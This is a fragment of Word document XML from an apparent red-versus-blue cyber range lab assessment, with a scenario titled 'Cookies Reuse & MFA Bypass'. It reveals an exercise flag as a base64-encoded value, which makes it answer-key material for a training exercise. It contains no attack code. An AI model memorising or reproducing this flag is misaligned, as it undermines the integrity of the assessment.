        <w:t xml:space="preserve">SCENARIO75{...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">value is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">U0NFTkFSSU83NXtCTFVFX0wwR19IVW50M3JfTTRzdDNyfQ==</w:t>
      </w:r>
      <w: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iduy01/naulidata-cyber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iduy01/naulidata-cyber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Assessment — Cyber Range Engineering (Red vs. Blue Lab)</dc:title>
  <dc:creator>Yudi Kurniawan</dc:creator>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-08T03:51:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-08T03:51:07Z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Scenario: “Cookies Reuse &amp; MFA Bypass”</vt:lpwstr>
  </property>
</Properties>
</file>